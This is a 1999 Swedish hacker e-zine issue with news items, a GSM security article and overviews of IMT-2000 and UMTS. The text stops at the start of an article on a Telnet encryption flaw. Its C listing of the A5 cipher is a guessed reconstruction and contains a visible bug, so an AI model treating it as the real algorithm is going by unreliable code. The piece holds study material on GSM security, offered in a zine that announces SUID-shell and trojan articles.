1456 lines
53 KiB
Plaintext
1456 lines
53 KiB
Plaintext
-----BEGIN PGP SIGNED MESSAGE-----
|
||
Hash: SHA1
|
||
|
||
|
||
Heretics Inc. presenterar....
|
||
|
||
|
||
|
||
|
||
|
||
|
||
[ Outlaw Informativa ]
|
||
|
||
issue 8, 99-10-09
|
||
|
||
___________________
|
||
|
||
O U T L A W 8
|
||
|
||
Oktober 9, 1999
|
||
___________________
|
||
|
||
- A Heretics Inc. Production -
|
||
|
||
|
||
|
||
"Det är den som går vilse som finner de nya vägarna"
|
||
- Niels Kjear
|
||
|
||
|
||
Var hälsad till nummer 8 av Outlaw Informativa. Detta nummer kommer förhoppn-
|
||
ingsvis att innehålla nyttig och intressant information. Som ni kommer märkt
|
||
så har Outlaw Informativa bytt från seriös stil till oseriös, jag har fått
|
||
många olika åsikter kring detta fenomen. En del tycker att det är kul med
|
||
lite humor där emellan vissa tycker raka motsatsen. Jag vet inte än hur jag
|
||
ska lösa detta, men för att hjälpa oss kan du enkelt skicka ett email till
|
||
keytrace@usa.net och säga vad du tycker. Jag har gått i funderingar på
|
||
att göra Outlaw Informativa till ett mer seriöst zine vilket ödet avgör att
|
||
Carding och Anarchy delarna tas bort, vad ni tycker om det kan ni genaste
|
||
skicka ett mail till mig. För övrigt kommer detta nummer innehålla lite
|
||
blandat information kring Telefon system, Säkerhet och även lite funderingar
|
||
och enkla undersöknaringar av olika system som ofta följer med en massa frå-
|
||
getecken som är meningen att ni ska maila in till keytrace@usa.net och svara
|
||
på.
|
||
|
||
-----------------------------------------------------------------------------
|
||
Disclaimer
|
||
-----------------------------------------------------------------------------
|
||
Andvänder du materialet i detta elektroniska tidning i olagligt syfte och
|
||
åker fast för det så får du stå för det. Du tar själv ansvar för dina egna
|
||
handlingar.
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Medverkande
|
||
-----------------------------------------------------------------------------
|
||
En enkel lista med folk som skrivit för detta nummer och hur du kan komma i
|
||
kontakt med personen.
|
||
|
||
|
||
Alias: diox1de Contact: keytrace@usa.net
|
||
¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
||
Alias: ncode Contact: root@sectech.org
|
||
¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
||
Alias: p01nt_zer0 Contact: po1nt_zero@hotmail.com
|
||
¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|
||
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
|
||
|
||
|
||
I N N E H Å L L S F Ö T E C K N I N G
|
||
|
||
|
||
|
||
$ Staff
|
||
|
||
1:1. Editor
|
||
1:2. Disclaimer
|
||
1:3. Medverkande
|
||
1:4. Innehållsförteckning
|
||
1:5. Aktuellt
|
||
1.6. Heretics Manifesto
|
||
|
||
|
||
$ Nyheter
|
||
|
||
2.1. Microsoft kritiserar Linux
|
||
2.2. Sun släpper källkoden för Solaris fri
|
||
|
||
|
||
$ Phreaking och Telefoni
|
||
|
||
3:1. Säkerhet i GSM systemet, del #3 av: diox1de
|
||
3:2. IMT-2000/FPLMTS av: p01nt_zer0
|
||
3:3. UMTS av: p01nt_zer0
|
||
|
||
|
||
$ Hacking, Säkerhet, Unix etc.
|
||
|
||
4:1. Paket kryptering i Telnet av: diox1de
|
||
4:2. Möjlig bakdörr i marijuana.com av: diox1de
|
||
4:3. Funderingar kring Telia av: diox1de
|
||
4:4. Skapa ett SUID Shell av: ncode
|
||
4:5. Enkelt om 2 olika Trojaner av: diox1de
|
||
4:6. Brev angående telias rätt om språrning av: anonymous
|
||
4:7. Linux för dumma, del #1 av: diox1de
|
||
|
||
|
||
$ Insändare
|
||
|
||
5:1. Netscape 4.05 (Messenger) kryptering
|
||
|
||
|
||
$ Några ord innan slutet
|
||
|
||
6:1 . Copyright
|
||
6:2 . return 0;
|
||
|
||
|
||
|
||
|
||
När du befinner dig på öppet territorium, stör ingen. Om någon stör dig,
|
||
be honom sluta. Slutar han inte, gör slut på honom.
|
||
|
||
|
||
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Aktuellt
|
||
-----------------------------------------------------------------------------
|
||
|
||
¤ Heretics hemsida flyttad
|
||
|
||
Heretics Inc. 's hemsida flyttades från kontot till www.g1mp.net/heretics,
|
||
och det har jag ncode att tacka för, tack
|
||
|
||
|
||
¤ Prenumerations listan läggs ner !
|
||
|
||
Prenumerations listan läggs ner, eftersom alla prenumerationer försvann i en
|
||
hårdisk krash, och när jag checkade min mail dit alla prenumerationer skickas
|
||
så låg där 200 stycken, jag har inte andvändt mig av något program som
|
||
hanterar prenumerationen.
|
||
|
||
|
||
¤ p01nt_zer0 skriver lite texter, kommer eventuellt joina
|
||
|
||
p01nt_zer0 har mycket kunskap kring Phreaking/Telefoni och han kommer möjlig-
|
||
tvis joina Heretics, än så länge verkar det som han lyckats, eftersom inform-
|
||
ationen som kommer bla. i detta nummer inte finns i något annat zine..alltså
|
||
inte så välskrivet om :)
|
||
|
||
|
||
¤ Kunskapsplan resulterar i texter och artiklar
|
||
|
||
Jag diox1de har lagt upp något som jag kallar för en kunskapslan. Jag har
|
||
lagt upp typ ett schema vad jag ska läsa och praktisera om, nu håller jag på
|
||
att studera Unix nästa kommer bli Windows NT, sen C programmering osv.
|
||
Detta kommer resultera att jag skriver textfiler/artiklar, men dessa kommer
|
||
bara vara skrivna för min egen skull, för att jag ska lära mig bättre.
|
||
|
||
|
||
¤ Kommande Projekt
|
||
|
||
En tutorial om Kryptering
|
||
|
||
Kryptering är ett hett ämne just nu, pågrund av att mycket har börjat
|
||
skötas via Internet, typ internet handel och dyl. Detta är så pass nytt
|
||
så säkerheten ligger bakom frågetecknet. Därför hade jag tänkt att skriva
|
||
en tutorial om Kryptering som programmerare, systemansvariga och säkerhets
|
||
intresserade kommer ha nytta av.Jag kommer skriva om hur kryptering fungerar
|
||
vid kommunikation över känsliga kanalen, hur assymetriska och symmetriska
|
||
chiffer fungerar,lite enkelt om historia och angrepp mot de olika teknikerna
|
||
vid kryptering.
|
||
|
||
För att texten jag har börjat på ska hålla hög klass och nnehålla rätt
|
||
information så behöver jag åsikter, tips osv. om texten, visserligen har jag
|
||
inte kommit speciellt långt på den, ligger på ca. 30k just nu. Men du som
|
||
vet att du är hyffsat seriös och kan en del kring kryptering och har möjlig-
|
||
heter att hjälpa till så maila diox1de@hacksweden.com.
|
||
|
||
|
||
Praktik och Teori svävande kring PPP och Modem
|
||
|
||
Detta är ett eventuellt projekt som jag kanske ska börja med. Jag har läst
|
||
Rasslade lite i mitt text arkiv och hittade ett par textfiler om PPP protok-
|
||
ollet och om Modem kommunikation,j ag läste igenom information och blev dir-
|
||
ekt intresserad. Så nu håller jag på med en tutorial som jag kommer
|
||
kalla: Praktik och Teori svävande kring PPP och Modem. Den kommer innehålla
|
||
information hur Modem fungerar, hur du kodar fjärranslutnings script,
|
||
Teoretisk förklaring av PPP protokollet samt hur du sätter upp en PPP
|
||
anslutning i Linux. Om du vill hjälpa till och ge tips, förslag eller skicka
|
||
information svävande kring ämnet jag kommer skriva om så står min mail addr-
|
||
ess nedan.
|
||
|
||
- diox1de@hacksweden.com
|
||
|
||
|
||
NTFS whitepaper
|
||
|
||
Detta är ett eventuellt projekt som jag kanske ska börja med. Jag har läst
|
||
lite smått om NTFS (Network File System) och blivit mycket intresserad. Om
|
||
du vill att det ska bli nåt så skicka så mycket information om NTFS du kan
|
||
till diox1de@hacksweden.com. Först och främst ska jag ägna mig åt texten om
|
||
kryptering och Outlaw Informativa. Men när texten om kryptering börjar ta
|
||
sig i form och bli klar så kommer jag antagligen börja ordenkligt med texten
|
||
om NTFS. Det är bara en tidfråga tills det ligger NTFS whitepaper ligger
|
||
på Heretics projekt arkiv.
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Heretics Manifesto
|
||
-----------------------------------------------------------------------------
|
||
Vi förstår att du vill lära dig, men för att lära dig behöver du styrka som
|
||
kommer följa dig tills du når dina mål. Styrkan kommer hjälpa dig att förstå,
|
||
att hantera fel. Under tiden du lär dig måste du hela tiden hålla tanken i
|
||
bakhuvudet; överskatta dig inte själv, var självsäker men dölj det för andra.
|
||
Om det är någon som ber om hjälp, bli då uppmärksamm och försök att hjälpa
|
||
personen så mycket du kan. Akta dig noga för den mörka sidan byggt på elitis-
|
||
m, känner du stor ondska över en person försök hålla kommentarerna till dig
|
||
själv och bevara dom där eller argumentera på ett bra sätt med personen.
|
||
|
||
The Dark Side is closer than you think.
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Microsoft kritiserar Linux
|
||
-----------------------------------------------------------------------------
|
||
Som ni kanske vet så är det många som byter från Microsofts operativsystem
|
||
till Linux, det har även själv gjort. Detta leder ju också till att MS
|
||
förlorar en jävla massa pengar. Microsoft är/har blivit oroliga och osäkra.
|
||
|
||
På en websida, närmare bestämt:
|
||
|
||
http://www.microsoft.com/ntserver/nts/news/msnw/LinuxMyths.asp
|
||
|
||
MS påstår att att Linux är ett ostabilt osäkert system jämnfört med WinNT.
|
||
Jag har själv studerat en del hål i Linux och i NT och gämnfört dem, resulta-
|
||
tet är ju då att Windows NT är så grymt mycket ostabilare än vad Linux är. MS
|
||
tar till alla medel för att skrämma Linux andvändarna och sno tillbaka sina
|
||
kunder. Seriöst så tror jag att dom inte har lyckats något vidare.
|
||
|
||
|
||
Källa: http://linux.idg.se
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Sun släpper källkoden för Solaris fri
|
||
-----------------------------------------------------------------------------
|
||
Sun Microsystems släpper källkoden för sitt os Solaris helt fri. Villkoret är
|
||
dock att programmerarna inte får utveckla sina egna lösningar.
|
||
|
||
Dom släppte den fri för att bla. administratörer ska kunna bygga ett kluster
|
||
eller sätta upp en webbserver, då väljer dom istället Linux framför Solaris.
|
||
|
||
Det kommer även bli stor konkuranns när Microsoft släpper sitt nya os
|
||
Windows 2000.
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Säkerhet i GSM systemet, del #3
|
||
-----------------------------------------------------------------------------
|
||
|
||
[Förord]
|
||
|
||
Ännu en del om GSM Säkerhet, ligger nu uppe i #3 delen och kommer bli den
|
||
sista, men jag kommer dock förlänga den här artikeln lite. Den kommer alltså
|
||
bli en aning större en de andra delarna.
|
||
|
||
[Översikt]
|
||
|
||
För er som inte läst alla #3 serierna om GSM Säkerhet så tänkte jag gå igenom
|
||
vad alla handlar om.
|
||
|
||
.---------------------------------------------------------------------------.
|
||
|DEL #1: Handlar om hur Subscriber Identity Authentication fungerar och |
|
||
| lite annat smått och gott som dyker upp där emellan. |
|
||
| |
|
||
|DEL #2: Handlar om Krypterings-algoritmen A5, hur den fungerar teoretiskt |
|
||
| sätt. |
|
||
| |
|
||
|DEL #3: Handlar om hur "User and Signalling Data Confidentiality" fungerar |
|
||
| och lite om A5 igen som andvänds i det ovan + Subscriber Identity |
|
||
| Confidentiality . |
|
||
`---------------------------------------------------------------------------´
|
||
|
||
|
||
[User and Signalling Data Confidentiality]
|
||
|
||
User and Signalling Data Confidentiality har tre element att ta hand om och
|
||
dessa är:
|
||
|
||
¤ user data confidentiality
|
||
¤ signalling information on physical connections
|
||
¤ connectionless user data confidentiality and signalling information
|
||
element confidentiality.
|
||
|
||
|
||
--> "user data confidentiality"
|
||
|
||
Tar hand om privacy för andvändaren som genererat all data, både röster
|
||
och data som kommer från mobilen. Alltså som skickas över radio och trafik
|
||
kanalerna.
|
||
|
||
|
||
--> "signalling information" som seglar runt på fysiska anslutningar
|
||
|
||
Signal Informationen (Signalling Information) har också med privacy att
|
||
göra. Tar hand om andvändar information som skickas i form av ett paket
|
||
av information som går via radio länken på signal kanalen. Detta
|
||
transporteras hit och dit på de fysiska anslutningarna (physical connecti-
|
||
ons)
|
||
|
||
|
||
--> "connectionless user data confidentiality" och "signalling information
|
||
element confidentiality".
|
||
|
||
Det tredje elementet förser för enskildheter av en "certain user" som är
|
||
besläktad med andra signal element som går via radio länken på signal
|
||
kanalen.
|
||
|
||
|
||
För att det ska bli säkert i överföring av alla de tre elmenten så behövs
|
||
självklart kryptering, här andvänds A5 som är beskriven i del #2. För att det
|
||
ska funka att andvända A5 algoritm så måste alla nätverk och mobiler ha stöd
|
||
för det, annars blir det en hel del problem. Jag tänke beskriva algoritm
|
||
A5 lite enkelt för att uppdaterera era kunskaper, men främst mina.
|
||
|
||
A5 är en algortim för att kryptera trafik. Först skapar den en keystream
|
||
under kontroll av en en nyckel. Bit för Bit av keystreamen transporteras över
|
||
Radio Länken mellan Basstationen och MS:en. Nyckeln blir etablerad på MS:en
|
||
som en liten del av authenication proceduren. Informationen blir dekrypterad
|
||
efter MS:en har blivit identifierad. Mer orkar jag inte berätta pågrund av
|
||
bakfylla, trötthet osv. Men A5 är ju förklarad i #7:an så ni kan ju läsa där
|
||
också.
|
||
|
||
Note: MS = Mobile Subscriber, mobiltelefon med andra ord.
|
||
|
||
|
||
[Subscriber Identity Confidentiality]
|
||
|
||
Är en slags funktion eller applikation som gör det möjligt för en andvändare
|
||
att uppdatera sin "location etc." utan att avslöja sitt "International Mobile
|
||
Subscriber Identity (IMSI) för någon som gör ett försök till ett angrepp
|
||
på radio länken. Med andra ord hindrar den alltså att någon sniffar signal
|
||
växlingen på radio länken för att söka upp en bestämd mobitelefonens befintl-
|
||
iga "location". Alla mobil nät och mobiltelefoner måste i regel kunna stödja
|
||
denna tjänst, det är iofs inte helt obligatoriskt.
|
||
|
||
Det är absolut nödvändigt att IMSI inte skickas i cleartext på Radio länken,
|
||
visserligen finns det fall där det inte gör det och då dyker många effektiva
|
||
angrepp upp som kan göra att en person kan s niffa Radio länken. Mekanism i
|
||
mobilen ska vara försedd med denna funktion och den ska även vara baserad på
|
||
temporary mobile subscriber identity (TMSI) som oskyldigt men mycket säkert
|
||
uppdateras efter varje lyckad tillgång (Successful Access :P) till systemet.
|
||
I princip så behöver inte TMSI vara krypterad när den överförs på Radio Länk-
|
||
en. Som nämnt tidigare så behöver däremot IMSI vara krypterad eftersom
|
||
effektiva angrepp kan uppstå.
|
||
|
||
Hur fungerar det då?...Jo, detta förutsätter att MS är tilldelat med en TMSI,
|
||
betecknas betäcknas som TMSIo, och att nätverket har etablerat en förening
|
||
mellan TMSIo och en sk. "Mobile Subscriber" alltså typ en abbonent eller helt
|
||
enkelt en mobiltelefon. MS identifierar sig med Nätverket (authenticerar).
|
||
Direkt efter authenticationen är genomförd (om den nu blir det :-/) Nätverket
|
||
generar ett nytt TMSI, betäcknas då som TMSIn, och skickar sedan det till MS
|
||
och skickas då i krypterad form (Krypterat med nyckeln Kc) MS dekrypterar
|
||
och ersätter TMSIo med TMSIn.
|
||
|
||
|
||
[Ett exempel på A5]
|
||
|
||
Här kommer källkoden för ett exempel av A5 algoritmen. Du kan försöka hitta
|
||
på något kul med den eller nåt.
|
||
|
||
|
||
/*
|
||
* In writing this program, I've had to guess a few pices of information:
|
||
*
|
||
* 1. Which bits of the key are loaded into which bits of the shift register
|
||
* 2. Which order the frame sequence number is shifted into the SR (MSB
|
||
* first or LSB first)
|
||
* 3. The position of the feedback taps on R2 and R3 (R1 is known).
|
||
* 4. The position of the clock control taps. These are on the
|
||
* `middle' one,
|
||
* I've assumed to be 9 on R1, 11 on R2, 11 on R3.
|
||
*/
|
||
|
||
/*
|
||
* Look at the `middle' stage of each of the 3 shift registers.
|
||
* Either 0, 1, 2 or 3 of these 3 taps will be set high.
|
||
* If 0 or 1 or one of them are high, return true. This will cause each of
|
||
* the middle taps to be inverted before being used as a clock control. In
|
||
* all cases either 2 or 3 of the clock enable lines will be active. Thus,
|
||
* at least two shift registers change on every clock-tick and the system
|
||
* never becomes stuck.
|
||
*/
|
||
|
||
static int threshold(r1, r2, r3)
|
||
unsigned int r1;
|
||
unsigned int r2;
|
||
unsigned int r3;
|
||
{
|
||
int total;
|
||
|
||
total = (((r1 >> 9) & 0x1) == 1) +
|
||
(((r2 >> 11) & 0x1) == 1) +
|
||
(((r3 >> 11) & 0x1) == 1);
|
||
|
||
if (total > 1)
|
||
return (0);
|
||
else
|
||
return (1);
|
||
}
|
||
|
||
unsigned long clock_r1(ctl, r1)
|
||
int ctl;
|
||
unsigned long r1;
|
||
{
|
||
unsigned long feedback;
|
||
|
||
/*
|
||
* Primitive polynomial x**19 + x**5 + x**2 + x + 1
|
||
*/
|
||
|
||
ctl ^= ((r1 >> 9) & 0x1);
|
||
if (ctl)
|
||
{
|
||
feedback = (r1 >> 18) ^ (r1 >> 17) ^ (r1 >> 16) ^ (r1 >> 13);
|
||
r1 = (r1 << 1) & 0x7ffff;
|
||
if (feedback & 0x01)
|
||
r1 ^= 0x01;
|
||
}
|
||
return (r1);
|
||
}
|
||
|
||
unsigned long clock_r2(ctl, r2)
|
||
int ctl;
|
||
unsigned long r2;
|
||
{
|
||
unsigned long feedback;
|
||
|
||
|
||
/*
|
||
* Primitive polynomial x**22 + x**9 + x**5 + x + 1
|
||
*/
|
||
|
||
ctl ^= ((r2 >> 11) & 0x1);
|
||
if (ctl)
|
||
{
|
||
feedback = (r2 >> 21) ^ (r2 >> 20) ^ (r2 >> 16) ^ (r2 >> 12);
|
||
r2 = (r2 << 1) & 0x3fffff;
|
||
if (feedback & 0x01)
|
||
r2 ^= 0x01;
|
||
}
|
||
return (r2);
|
||
}
|
||
|
||
unsigned long clock_r3(ctl, r3)
|
||
int ctl;
|
||
unsigned long r3;
|
||
{
|
||
unsigned long feedback;
|
||
|
||
/*
|
||
* Primitive polynomial x**23 + x**5 + x**4 + x + 1
|
||
*/
|
||
|
||
ctl ^= ((r3 >> 11) & 0x1);
|
||
if (ctl)
|
||
{
|
||
feedback = (r3 >> 22) ^ (r3 >> 21) ^ (r3 >> 18) ^ (r3 >> 17);
|
||
r3 = (r3 << 1) & 0x7fffff;
|
||
if (feedback & 0x01)
|
||
r3 ^= 0x01;
|
||
}
|
||
return (r3);
|
||
}
|
||
|
||
int keystream(key, frame, alice, bob)
|
||
unsigned char *key; /* 64 bit session key */
|
||
unsigned long frame; /* 22 bit frame sequence number */
|
||
unsigned char *alice; /* 114 bit Alice to Bob key stream */
|
||
unsigned char *bob; /* 114 bit Bob to Alice key stream */
|
||
{
|
||
unsigned long r1; /* 19 bit shift register */
|
||
unsigned long r2; /* 22 bit shift register */
|
||
unsigned long r3; /* 23 bit shift register */
|
||
int i; /* counter for loops */
|
||
int clock_ctl; /* xored with clock enable on each shift register */
|
||
unsigned char *ptr; /* current position in keystream */
|
||
unsigned char byte; /* byte of keystream being assembled */
|
||
unsigned int bits; /* number of bits of keystream in byte */
|
||
unsigned int bit; /* bit output from keystream generator */
|
||
|
||
/* Initialise shift registers from session key */
|
||
|
||
r1 = (key[0] | (key[1] << 8) | (key[2] << 16) ) & 0x7ffff;
|
||
r2 = ((key[2] >> 3) | (key[3] << 5) | (key[4] << 13) |
|
||
(key[5] << 21)) & 0x3fffff;
|
||
r3 = ((key[5] >> 1) | (key[6] << 7) | (key[7] << 15) ) & 0x7fffff;
|
||
|
||
|
||
/* Merge frame sequence number into shift register state, by xor'ing it
|
||
* into the feedback path
|
||
*/
|
||
|
||
for (i=0;i<22;i++)
|
||
{
|
||
clock_ctl = threshold(r1, r2, r2);
|
||
r1 = clock_r1(clock_ctl, r1);
|
||
r2 = clock_r2(clock_ctl, r2);
|
||
r3 = clock_r3(clock_ctl, r3);
|
||
if (frame & 1)
|
||
{
|
||
r1 ^= 1;
|
||
r2 ^= 1;
|
||
r3 ^= 1;
|
||
}
|
||
frame = frame >> 1;
|
||
}
|
||
|
||
/* Run shift registers for 100 clock ticks to allow frame number to
|
||
* be diffused into all the bits of the shift registers
|
||
*/
|
||
|
||
for (i=0;i<100;i++)
|
||
{
|
||
clock_ctl = threshold(r1, r2, r2);
|
||
r1 = clock_r1(clock_ctl, r1);
|
||
r2 = clock_r2(clock_ctl, r2);
|
||
r3 = clock_r3(clock_ctl, r3);
|
||
}
|
||
|
||
/* Produce 114 bits of Alice->Bob key stream */
|
||
|
||
ptr = alice;
|
||
bits = 0;
|
||
byte = 0;
|
||
for (i=0;i<114;i++)
|
||
{
|
||
clock_ctl = threshold(r1, r2, r2);
|
||
r1 = clock_r1(clock_ctl, r1);
|
||
r2 = clock_r2(clock_ctl, r2);
|
||
r3 = clock_r3(clock_ctl, r3);
|
||
|
||
bit = ((r1 >> 18) ^ (r2 >> 21) ^ (r3 >> 22)) & 0x01;
|
||
byte = (byte << 1) | bit;
|
||
bits++;
|
||
if (bits == 8)
|
||
{
|
||
*ptr = byte;
|
||
ptr++;
|
||
bits = 0;
|
||
byte = 0;
|
||
}
|
||
}
|
||
if (bits)
|
||
*ptr = byte;
|
||
|
||
/* Run shift registers for another 100 bits to hide relationship between
|
||
* Alice->Bob key stream and Bob->Alice key stream.
|
||
*/
|
||
|
||
for (i=0;i<100;i++)
|
||
{
|
||
clock_ctl = threshold(r1, r2, r2);
|
||
r1 = clock_r1(clock_ctl, r1);
|
||
r2 = clock_r2(clock_ctl, r2);
|
||
r3 = clock_r3(clock_ctl, r3);
|
||
}
|
||
|
||
/* Produce 114 bits of Bob->Alice key stream */
|
||
|
||
ptr = bob;
|
||
bits = 0;
|
||
byte = 0;
|
||
for (i=0;i<114;i++)
|
||
{
|
||
clock_ctl = threshold(r1, r2, r2);
|
||
r1 = clock_r1(clock_ctl, r1);
|
||
r2 = clock_r2(clock_ctl, r2);
|
||
r3 = clock_r3(clock_ctl, r3);
|
||
|
||
bit = ((r1 >> 18) ^ (r2 >> 21) ^ (r3 >> 22)) & 0x01;
|
||
byte = (byte << 1) | bit;
|
||
bits++;
|
||
if (bits == 8)
|
||
{
|
||
*ptr = byte;
|
||
ptr++;
|
||
bits = 0;
|
||
byte = 0;
|
||
}
|
||
}
|
||
if (bits)
|
||
*ptr = byte;
|
||
|
||
return (0);
|
||
|
||
}
|
||
|
||
|
||
[Förkortningar, sammanfattning]
|
||
|
||
LSFR : Linear Feedback Shift Register
|
||
MS : Mobile Subscriber dvs. Mobil Telefon
|
||
TMSI : temporary mobile subscriber identity
|
||
IMSI : International Mobile Subscriber Identity
|
||
AUC : Authentication Center
|
||
HLR : Home Location Register
|
||
VLR : Visitor Location Register
|
||
|
||
hehe, som sagt: Ingen publicerings kvalitet.
|
||
|
||
|
||
|
||
[Källförteckning]
|
||
|
||
Eftersom det här va sista delen så tänke jag skriva källförtecking, alltså
|
||
var jag fått tag i all info.
|
||
|
||
Overview of GSM Security Features (LoU)
|
||
Att förstå Telekommunikaion (Telia & Ericsson)
|
||
Usenet (sci.crypt)
|
||
|
||
|
||
[Efterord]
|
||
|
||
Nu va det slut på serien "Säkerhet i GSM systemet", om du skulle läsa även
|
||
dokumentationen som är tecknad i avdelningen "Källförteckning" kan du lätt
|
||
uppleva som att jag återberättar och översätter informationen. Det är delvis
|
||
sant, att jag skrev denna serie med artiklar va för min egen skull eftersom
|
||
jag har studerat GSM Säkerhet ett tag, dock ingen direkt fördjupning i ämnet.
|
||
Om ni tyckte att serierna var nyttiga och bra så är det ju bara ett bonus.
|
||
Jag vet att de inte höll någon publicerings kvalitet. Men jag släppte dem
|
||
endå. Förövrigt har jag dragit slutsatsen om att GSM Nätet håller förhålland-
|
||
evis mycket hög Säkerhet som inte direkt vem som helst skulle kunna göra ett
|
||
effektivt angrepp mot. Glöm inte bort att artiklarna är baserade på en studie
|
||
i GSM Säkerhet.
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
IMT-2000/FPLMTS
|
||
-----------------------------------------------------------------------------
|
||
FPLMTS - Future Public Land Mobile Telecommunication System har bytt namn
|
||
till IMT-2000 - International Mobile Telecommunication 2000. Förutom FPLMTS
|
||
ingår även GMPCS - Global Mobile Personal Communications.
|
||
|
||
Utvecklingen av IMT-2000 drivs av ITU-R och målet är kommunikation när och
|
||
var som helst. Det är viktigt att det ska kunna utnyttjas med hjälp av en
|
||
liten kommunikationsenhet man lätt kan bära med sig, t.ex. en mobiltelefon.
|
||
|
||
IMT-2000 omfattar flera olika radiomiljöer, som börjar med små miljöer
|
||
inomhus, där man skall erbjuda hög kapacitet, detta fortsätter vidare via
|
||
lokala och regionala miljöer till en global miljö där man med hjälp av
|
||
satelliter täcker in hela jorden.
|
||
|
||
Man kommer alltså att använda olika tekniker inom områden, samtidigt som
|
||
dessa tekniker ska kunna samverka och bilda en enhet, jämför med GSM/DECT
|
||
där det finns telefoner som kan arbeta inom båda miljöerna.
|
||
|
||
De frekvenser som ska användas har angivits till 1.885-2.225 och 1.980-
|
||
2.200 MHz, varav 1.980-2.010 och 2.170-2.200 skall användas för satelitkommu-
|
||
nikation. Frekvenserna har angivits av WARC - World Administrative Radio
|
||
Conferance.
|
||
|
||
IMT-2000/FPLMTS och UMTS är tredje generationens mobiltelefonisystem, andra
|
||
generationens GSM, D-AMPS och PDC är det vi använder idag och första
|
||
generationen, som fortfarande är i bruk NMT, AMPS och TACS. Ett av de viktig-
|
||
aste målen för IMT-2000 är att utforma en global standard, så att samma
|
||
system kan användas över hela världen.
|
||
|
||
Följande standarder har utformats av ITU-R för att beskriva IMT-2000:
|
||
|
||
Standard: Innehåll:
|
||
|
||
M.816 Framework for services supported by FPLMTS.
|
||
M.817 Network architectures for FPLMTS.
|
||
M.818 Satellite operation whitin FPLMTS.
|
||
M.819 Adaption of FPLMTS to the needs of developing countries.
|
||
M.1034 Requirements for the radio interface(s) for FPLMTS.
|
||
M.1035 Framework for the radio interface(s) and radio subsystem
|
||
functionality for FPLMTS.
|
||
M.1036 Spectrum consideations for implementation of FPLMTS in the
|
||
bands 1885-2025 MHz and 2110 MHz.
|
||
M.1078 Security principles for FPLMTS.
|
||
M.1079 Spech and voiceband data performance requirements for FPLMTS.
|
||
|
||
(Tabellen är inte översatt pågrund av att det är lättare att förstå
|
||
vad som menas om det är på engelska om det skulle dyka upp i andra
|
||
texter när du studerar)
|
||
|
||
|
||
IMT-2000/FPLMTS kommer att erbjuda ett brett utbud av tjänster, baserat på de
|
||
tjänster såväl fasta som mobila telenät kan erbjuda.
|
||
Tjänsterna omfattar personsökning, digitala datatjänster och audio/video.
|
||
Tjänster som kräver hög bandbredd/kapacitet kommer i första hand att erbjudas
|
||
i tätbefolkade områden.
|
||
Oavsett var i världen man befinner sig, kommer man minst att ha tillgång till
|
||
ett grundutbud av tjänster.
|
||
|
||
|
||
|
||
Knowledge is a treashre but...
|
||
practice is the main key to to it.
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
UMTS
|
||
-----------------------------------------------------------------------------
|
||
UMTS är ett europiskt initiativ som drivs av ETSI, för att skapa en gemensam
|
||
internationell standard för alla former av mobiltelekommunication, inklusive
|
||
mobiltelefoni.
|
||
UMTS är en europisk variant an IMT-2000 - International Mobile Tele-
|
||
communication 2000 som drivs av ITU. (jag gått igenom det i en tidigare text)
|
||
|
||
De generella målen för UMTS är:
|
||
|
||
Kapacitet:
|
||
|
||
Att kunna erbjuda upp till 2 Mbps kapacitet för olika tjänster, med
|
||
reservation för de fysiska förutsättningarna som den aktuella
|
||
förbindelsen erbjuder.
|
||
|
||
Kvalitet:
|
||
|
||
Erbjuda en kvalitet på kommunikation som lägst uppfyller de krav som
|
||
gäller för fasta förbindelser.
|
||
|
||
Funktioner, tjänster:
|
||
|
||
Kunna tillhandahålla ett brett spektra av tjänster anpassade för olika
|
||
användare.
|
||
|
||
Stöda UPT (Universal Personal Telecommunications).
|
||
|
||
Att stöda "wideband" intergration med B-ISDN via ATM.
|
||
|
||
Det ska vara dynamiskt så att det är lätt att lägga till nya tjänster
|
||
och funktioner.
|
||
|
||
Det ska kunna allokera bandbredd dynamiskt och vid behov (on demand).
|
||
|
||
Kompatibilitet, standarder:
|
||
|
||
Det ska stämma överäns med ITUs IMT-2000 rekommendationer.
|
||
|
||
Det ska kunna anpassas för alla tjänster och all utrustning som i fram-
|
||
tiden kommer att kunna användas i fasta nät.
|
||
|
||
Det ska finnas stöd för både öppna och slutna standarder.
|
||
|
||
Kompatibilitet för intelligenta tjänster i både fasta och mobila nätverk.
|
||
|
||
Kunna förena de många mobiltelefonisystem som finns idag, samtidigt som
|
||
valfrihet ska kunna erbjudas.
|
||
|
||
Det ska kunna fungera internationellt (iaf i Europa), inom olika typer
|
||
av miljöer och terräng.
|
||
|
||
Det ska kunna stöda avreglering och konlurrens inom alla typer av miljöer
|
||
och applikationer.
|
||
|
||
Dela resurserna i radiobandet mellan olika operatörer, både publika och
|
||
privata.
|
||
Dela resurserna i radiobandet mellan ett standardiserat grundutbud av
|
||
tjänster och ett mer dynmiskt utbud som baseras på marknadens behov.
|
||
|
||
Det är alltså ganska många krav som skall uppfyllas, men vissa av dem är
|
||
redan lösta, t.ex. med hjälp av GSM.
|
||
|
||
|
||
Nätverk och radiolänk
|
||
|
||
UMTS utformas för att använda Intelligenta Nätverk (IN) och erbjuda de
|
||
tjänster som då blir möjliga, de komponenter som kommer att ingå är t.ex.
|
||
SCPer. Detta gör att man lätt kan åstakomma användaranpassade tjänster och
|
||
att man kan ändra tjänsterna i grundutbudet.
|
||
|
||
UMTS ska ingå i IBCN - Intergrated Broadband Communications Network som en
|
||
enhet för mobil access mot B-ISDN. Detta innebär att mobila nät kommer att
|
||
kunna erbjuda tjänster som tidigare endast fasta nät kunnat erbjuda.
|
||
|
||
|
||
|
||
Knowledge is a treashre but...
|
||
practice is the main key to to it.
|
||
|
||
|
||
-----------------------------------------------------------------------------
|
||
Paket kryptering i Telnet
|
||
-----------------------------------------------------------------------------
|
||
Jag tänkte ta upp ett hål i Berkelys Telnet klienter som stödjer "Telnet enc-
|
||
